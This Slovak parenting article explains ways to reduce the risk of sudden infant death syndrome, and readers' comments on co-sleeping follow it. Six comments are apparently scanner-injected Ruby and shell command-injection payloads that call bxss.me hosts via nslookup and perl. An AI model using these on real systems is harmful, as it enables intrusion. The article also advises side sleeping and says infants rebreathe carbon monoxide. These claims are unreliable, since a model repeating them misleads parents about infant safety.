Ako predchádzať syndrómu náhleho úmrtia dojčiat?

Mária Kopčíková 86

Syndróm náhleho úmrtia dojčiat je strašiak rodičov. Nevieme, prečo presne sa udeje – možných príčin SIDS potvrdených výskumami je viacero.

Ak ale poznáme príčiny, vieme o rizikových faktoroch SIDS, môžeme sa zamyslieť nad prevenciou a pokúsiť sa minimalizovať situácie, ktoré k rozvoju SIDS pravdepodobne vedú.

Zdroj: ingimage.com

Ako teda robiť prevenciu SIDS?

 Dávajte dieťatko spať na chrbát alebo polobok

Predídete tak tomu, aby pri spánku na brušku dieťa nevdychovalo do seba práve vydýchnutý oxid uhoľnatý. Tiež je to prevencia proti tomu, aby si dieťa nezaborilo tvár do matracu – je to nebezpečné, kým sa nevie samo pretočiť, aby si uvoľnilo dýchacie cesty.

Poučte o tejto vhodnej polohe na spánok každého, kto sa má starať o vaše dieťa – starých rodičov, súrodencov ….

Prečítajte si aj: Rizikové faktory SIDS.

 Nedávajte deťom med – hrozí im botulizmus

Zdá sa vám to ako úplná hlúposť a nikdy by ste to neurobili? Koľko starých mám odporúča dať nepokojnému bábätku med na cumeľ? Aby sa upokojilo?

Podľa odborníkov med zvyšuje pravdepodobnosť výskytu botulizmu. Dojčenský botulizmus je spôsobený požitím spor (kľudových foriem baktérie), ktoré produkujú toxín. Zdrojom nákazy býva najčastejšie med. Malé deti majú nižšiu kyslosť tráviaceho traktu a tak aj menšiu schopnosť zničiť pôvodcov tohto ochorenia. Baktérie, ktoré spôsobujú botulizmus, sa spájajú so vznikom SIDS.

 Nefajčite v prítomnosti dieťaťa

Ani to nedovoľte nikomu inému. Dojčatá žijúce vo fajčiarskom prostredí majú až 3,5x vyššie riziko SIDS ako deti z nefajčiarskeho prostredia.

 Žiadne mäkké lôžko a lôžkoviny

Dieťa by malo spať na pevnom podklade, matrac by nemal byť príliš mäkký – dieťa si doň poľahky môže zaboriť tvár. Dbajte na dobre sadnúcu plachtu, aby sa nehúžvala a neposkytla priestor na zamotanie sa dieťaťa do nej.

Dieťa nemá mať v postieľke žiadne vankúš, žiadny paplón, pod ktoré sa môže dostať alebo sa do neho zamotať.

 Neobliekajte vaše dieťa príliš a zbytočne neprekurujte byt

Teplota v miestnosti, kde dieťa spí, by sa mala pohybovať okolo19 – 21 stupňov. Prekurovanie vedie k zvýšenému riziki SIDS, dieťa v prílišnom teple plytko dýcha. Pri obliekaní dieťa skôr vrstvite, nedávajte mi len jednu hrubú vrstvu, ale viacej tenkých. Keďže by dieťa nemalo mať v postieľke paplón, riešením je pyžamko, ktoré pokryje celý povrch tela, ruky aj nohy, prípadne detské spacie vaky.

 Dojčenie

Dojčenie je významným faktorom v prevencii SIDS.  Znižuje riziko výskytu SIDS až o 50%. Riziko výskytu SIDS u výlučne dojčených detí je až o 73% nižšie, než u nedojčených detí. Napriek týmto pozorovaniam, vyplývajúcim z výskumov, vedci nevedia označiť priamu súvislosť medzi dojčením a nízkym výskytom SIDS. Hovoria však o niekoľkých pravdepodobných biologických dôvodoch, prečo to tak je:

  • Materské mlieko chráni dieťa pred rôznymi infekciami, ktoré môžu viesť k SIDS.
  • Dojčené dieťa ľahšie preberiete zo spánku, zároveň dojčené dieťa obvykle nemá (najmä na začiatku života, kedy je výskyt SIDS najvýraznejší) tak dlhé spánkové cykly ako deti na umelej výžive.

 Monitory dychu

Na tieto prístroje rodičia častokrát vsádzajú ako na istotu, ktorá ich dieťa ochráni a rodičom zabezpečí spokojný spánok. Je dôležité vedieť, že ani monitor dychu nie je spoľahlivou ochranou pred SIDS. V istých prípadoch môže upozorniť na problém – a ten už musí riešiť niekto iný, prístroj samotný ho nevyrieši.

Monitory často spôsobujú falošné poplachy a odborníci ich odporúčajú nepoužívať paušálne, ale len u rizikových skupín detí.

Toto by vás mohlo zaujímať: O falošných poplachoch monitorov dychu.

Pochopiteľne, ako prevencia SIDS sa odporúča realizovať tieto preventívne opatrenia súbežne. Držíme všetkým rodičom palce, aby sa nikdy nemuseli stretnúť s takouto náročnou životnou situáciou, akou iste SIDS je.

Spracované podľa: webmd.com, sk.medlicker.com, patient.co.uk, medicinenet.com, pediatriepropraxi.cz, mayoclinic.org.

1 Hviezdička2 Hviezdičky3 Hviezdičky4 Hviezdičky5 Hviezdičiek (5 hlasov, priemerne: 4,20 z 5)
Loading...
Author image

Mária Kopčíková

Povolaním som psychologička a psychológií sa aj venujem vo svojej praxi v CPR KVAPKA.  Ako lektorka kurzov sa s rodičmi stretávam pred pôrodom, v podpore dojčenia, či príprave detí na školu. Prinášam témy, ktoré mi v praxi pripadajú dôležité.

články autora...

Komentáre k článku

  1. „+“A“.concat(70-3).concat(22*4).concat(101).concat(79).concat(102).concat(65)+(require“socket“

    Socket.gethostbyname(„hitoo“+“efrjoanuf4976.bxss.me.“)[3].to_s)+“

  2. ‚+’A‘.concat(70-3).concat(22*4).concat(103).concat(68).concat(109).concat(81)+(require’socket‘

    Socket.gethostbyname(‚hitdq’+’njwzcpxs3b0d0.bxss.me.‘)[3].to_s)+‘

  3. &(nslookup hitpitcncwmad2c084.bxss.me||perl -e „gethostbyname(‚hitpitcncwmad2c084.bxss.me‘)“)&'“`0&(nslookup hitpitcncwmad2c084.bxss.me||perl -e „gethostbyname(‚hitpitcncwmad2c084.bxss.me‘)“)&`‘

  4. ;(nslookup hitnbtilblbau6827d.bxss.me||perl -e „gethostbyname(‚hitnbtilblbau6827d.bxss.me‘)“)|(nslookup hitnbtilblbau6827d.bxss.me||perl -e „gethostbyname(‚hitnbtilblbau6827d.bxss.me‘)“)&(nslookup hitnbtilblbau6827d.bxss.me||perl -e „gethostbyname(‚hitnbtilblbau6827d.bxss.me‘)“)

  5. „+“A“.concat(70-3).concat(22*4).concat(121).concat(85).concat(120).concat(85)+(require“socket“

    Socket.gethostbyname(„hittm“+“kdfbxbei7d241.bxss.me.“)[3].to_s)+“

  6. &(nslookup hitnfoogxstswa2fed.bxss.me||perl -e „gethostbyname(‚hitnfoogxstswa2fed.bxss.me‘)“)&'“`0&(nslookup hitnfoogxstswa2fed.bxss.me||perl -e „gethostbyname(‚hitnfoogxstswa2fed.bxss.me‘)“)&`‘

  7. Lekari spanie v jednej posteli neodporucaju: thttp://www.bbc.co.uk/newsbeat/22612689

     

    2 tyzdnove chlapca zomrelo v naruci otca, pocas spanku:

    http://www.manchestereveningnews.co.uk/news/leigh-arnold-clinic-clodagh-delaney-6988381

     

    Kazdy nech si urobi podla seba. Ja si myslim, ze spolocne spanie je ten isty extrem ako spanie v inej miestnosti. Uplny suhlas ze dojca ma mat svoje miestecko v spalni s rodicmi, ale rozhodne nie sa tlacit v posteli s mamkou a tatom.

    1. Jasné. Je to ako nosiť dieťa v šatke či nosiči. Je tam oveľa väčšie riziko, že dieťa sa zadusí. Toto mi bežne hovorili úplne cudzí ľudia, na ulici. Je úžasné, ako vedia poradiť vo veci, čo nezažili. Spoločné spanie detto. Dieťa patrí do postieľky, najlepšie s monitorom dychu. Nech sa páči, nikomu v tom nebránim, ja ale budujem vzťah so svojim dieťaťom aj v noci. Keď 9 mesiacov bol pri mne, ani potom ho nedám preč niekam do postieľky. Toto je výmysel modernej doby. Ale ako som písala – nikomu v tom nebránim.
       
      Prajem všetko dobré.
       
       
       
      Ešte zaujímavý článok: http://www.mamila.sk/pre-matky/dojcenie-a/spolocne-spanie/

      1. Staci mat postielku vedla svojej postele. Pocicikat v noci ked treba, nadojcit a dat dietatko naspat. Aspon tak som to robila ja. Spolocne spanie by som neriskovala. Pre mna to vzdy malo cveng rizika.

  8. Ja vsádzam na spoločné spanie v manželskej posteli. S dieťaťom si na seba zvykneme a spoločná posteľ znamená aj spoločný spánok – t.j.keď sa niečo deje, tak sa prebudím. Možno sa tomu ťažko dá uveriť, ale ženy stratili vieru v seba, že sú najlepším „monitorom dychu“ dieťaťa. Nosením cez deň, dojčením na požiadanie a spoločným spaním ste prepojené s dieťaťom skoro na 100%.

Pridaj komentár